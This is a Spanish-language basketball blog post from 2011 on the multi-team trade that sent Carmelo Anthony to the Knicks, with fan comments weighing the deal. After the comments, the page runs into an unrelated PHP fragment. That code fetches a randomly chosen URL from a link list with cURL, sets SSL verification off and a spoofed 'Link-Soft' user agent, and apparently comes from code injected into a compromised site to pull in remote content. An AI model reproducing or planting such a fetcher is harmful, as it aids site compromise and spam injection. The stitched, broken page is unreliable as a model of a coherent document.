Carmelo se sale con la suya

22 de February de 2011 por TheDeerHunter

Copio, pego y modifico ligeramente el mensaje de nuestro contertulio Busky23 a primera hora de la mañana:

Denver Nuggets recibe a Danilo Gallinari, Wilson Chandler, Raymond Felton, Timofey Mozgov, la 1ª ronda 2014 de los Knicks, la 2ª ronda de 2012 de Golden State Warriors, la 2ª ronda de 2013 también de los Warriors y 3 millones de dólares. También reciben a Corey Brewer desde Minnesota.

New York Knicks recibe a Carmelo Anthony, Chauncey Billups, Shelden Williams, Anthony Carter y Renaldo Balkman. También recibe a Corey Brewer desde Minnesota.

Minnesota Timberwolves recibirá a Anthony Randolph, Eddy Curry, que será cortado, y 3 millones de dólares más.

Es el final del culebrón de la temporada. Los Knicks tiran de talonario para dar a sus aficionados lo que tanto ansiaban. No LeBron, pero sí Melo como un gran premio de consolación. Por fin llega la superestrella que les prometieron. ¿Quién gana y quién pierde en este megatraspaso? Pues habrá que verlo, pero quien lo tiene bien claro es Carmelo Anthony con 65 millones de dólares en 3 años, calentitos y directos a su bolsillo.

Pero como bien apuntaba Busky23, la cosa no parece terminar aquí en absoluto. En las oficinas de los Nuggets trabajan a destajo para  renovar a Nene aunque las informaciones son confusas en cuanto a qué pasaría posteriormente con el jugador brasileño. Por un lado se habla de que intentarían traspasarlo evitando así perderlo por nada ante la opción de salida con la que contará este verano. Pero por el otro lado se comenta de que en la era post-Carmelo, Nene juega un papel fundamental y que no quieren que se vaya. Lo que sí está claro es que estan tratando de colocar a Gallinari, que interesa a Raptors, Nets, Cavaliers y Clippers, a Al Harrington y posiblemente también a Felton. Se los quitan de las manos, oiga. Creo que efectivamente ese es el gran valor añadido que han logrado los Nuggets. Mantienen ciertas posibilidades de postemporada y obtienen una alta flexibilidad salarial para iniciar con fuerza un nuevo proyecto. A ver cómo juegan esas cartas.

Por su parte, los Knicks, pendientes de qué es lo que finalmente hará Billups, dan un impulso a su proyecto y se sitúan en la palestra para dar aún más guerra en los playoffs del Este. Ahora se encuentran con una plantilla corta que intentarán potenciar con fichajes menores como Jared Jeffries o Earl Barron pero la hora de la verdad llegará las próximas temporadas. Chris Paul, Deron Williams y Dwight Howard están en el punto de mira de la franquicia de la Gran Manzana de cara el  verano del 2012 y la llegada de cualquiera de los 3, pondría a New York a un nivel con el que no podían ni soñar hace unos años, en plena época Isiah Thomas.

Comenta

15 comentarios a esta entrada

  1. Vader dice:
    #1

    Pues ya esta hecho. A primera hora cuando he leido la noticia en diferentes medios no me ha quedado claro si Brewer iba a NY o Denver, la segunda opción era la más probable pero no me quedo claro.

    Claramente salen ganando los Knicks. Es muy dificil evaluar que te da y que pierdes con tantos jugadores de por medio pero nadie, repito nadie quiere perder un jugador como Melo y en cambio el 90% de las franquicias estarian dispuestas a perder 2 o 3 titulares por conseguirlo.

    Antes del traspaso NY tenia una superestrella y un equipo que aspiraba a playoff, sin más. Ahora tienen 2 superestrellas y estan en la pole-position para firmar dentro de un año o año y medio a Howard, Williams o Paul y formar su propio big three aspirante a TODO. Con la otra posibilidad que seria firmar a 2 o 3 jugadores de 1er nivel para rodear de una forma más equilibrada a Melo y Stat.

    La mejor decisión se vera cual es y dependera de las posibilidades que ofrezca el mercado pero yo estoy convencido de que el traspaso es histórico y muy bueno para los Knicks.

    Saludos y vamos Knicks!!!

      Citar

  2. Vader dice:
    #2

    Estoy repasando la noticia y me parece entender que Brewer va a NY y no a Denver. Se trata de un traspado independiente entre Knicks y Wolves.

    http://www.nba.com/2011/news/features/david_aldridge/02/22/carmelo.anthony.trade/index.html?ls=iref:nbahpt1

    Saludos

      Citar

  3. Txusma dice:
    #3

    Cierto, Brewer se va a los Knicks. Nos hemos colado ahí

      Citar

  4. Viva_Dirk dice:
    #4

    Si fichan después a uno de esos 3 o los rodean con varios jugadores creo que va a depender en cierta medida de que haga Billups, si después de los 14.5 kilos del año que viene firmara por la mid level, seguramente intentarían fichar a varios jugadores de nivel en lugar de a otra gran estrella, en ese año quedarian libres/restringidos jugadores como Gerald Wallace, Chris Kaman, Lamar Odom, Okur, OJ Mayo y David West, y de un salario menor otros como Rudy Fernandez, Beno Udrih, Barbosa, CJ Miles y Hinrich.

    Opciones tienen realmente muchas en el medio plazo, jugandolas bien tienen que pelear cada año la conferencia y el títulos. Y ojo que en el corto plazo estoy seguro de que esperan pasar de 1ª ronda o vender carísima su derrota ahí.

      Citar

  5. Busky23 dice:
    #5

    Esta mañana me preguntaba cuál sería el plan B de Prokhorov,pues bien,parece que ya se empiezan a despejar sus intenciones.

    Su intención es hacerse con Raimond Felton y su paisano Mozgov.
    Que ofrecen a Denver? Devin Harris,Derrick Favors y el denostrado Troy Murphy.
    Para que el traspaso sea factible,ambos equipos negocian con Dallas Mavericks,equipo donde volvería Devin Harris.
    Otra opción que se baraja es un cambio Harris-Murphy por André Miller y Przybilla.
    Otro nombre en boca de muchos es Gallinari,Nets,Raptors,Cavaliers y Clippers se han interesado por él.
    Menudos 2 días frenéticos nos esperan,ya tengo ganas que se acaben y que cada uno se juegue las habichuelas con lo puesto.

      Citar

  6. TheDeerHunter dice:
    #6

    jejeje
    la culpa de Busky…

      Citar

  7. Txusma dice:
    #7

    Raymond Felton y Mozgov valen los mismo que Harris, Favors y Troy Murphy? Me debo estar perdiendo algo…

      Citar

  8. Busky23 dice:
    #8

    Jajaja con tanto baile de nombres uno ya se pierde…
    Txusma,la idea no es esa,como he dicho Felton y Murphy recalarían en Denver, Harris iría a parar a Dallas,que a su vez mandaría un jugador suyo a Denver.

      Citar

  9. Busky23 dice:
    #9

    Basta!!!,me estoy haciendo la picha un lío jajaja,moderador,borre mis mensajes por favor

      Citar

  10. sergio dice:
    #10

    A nadie le llama la atencion lo que consiguen los Wolves? Se llevan a un tipo polivalente a priori como Randolph, consiguen a Eddy Curry que termina contrato el año que viene y consiguen dar minutos a Wesley Johnson en la posición de 2.

    Tengo que ver como se adapta Billups al sistema de D’Antoni. No lo veo el más indicado la verdad..

    De todos modos un equipo con Billups, Brewer, Fields, Carmelo y Stoudamire son palabras mayores por mucho que tengan uno de los peores banquillos de la Liga.

      Citar

  11. Txusma dice:
    #11

    No parece que Randolph baja a jugar muchos minutos en un equipo con Love, Beasley, Milicic y Pekovic. Y Wesley Johnson ha tenido todos los minutos del mundo para jugar como 3 y ha decepcionado profundamente. No acabo de ver tampoco una gran mejora más allá del dinero que se llevan

      Citar

  12. sergio dice:
    #12

    Mejoria no… definicion de roles y ahorro salarial si

      Citar

  13. Denise dice:
    #13

    A pesar del trade, sigo pensando que los Knicks son un equipo de media tabla y que el 4-0, 4-1 que le va a caer en primera ronda no se lo quita nadie por mucho Melo, Stout y Billups.
    Que error mas grande traspasar a Felton con el temporadon que estaba haciendo, y al ruso que está un poco verde pero puede ser apañado para el futuro.

      Citar

  14. M dice:
    #14

    Bueno, se da por hecho que Deron Williams se va a los Nets, según leo en twitter…tremendo

      Citar

  15. Txusma dice:
    #15

    Madrecita del amor hermoso… No se lo esperaba nadie

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>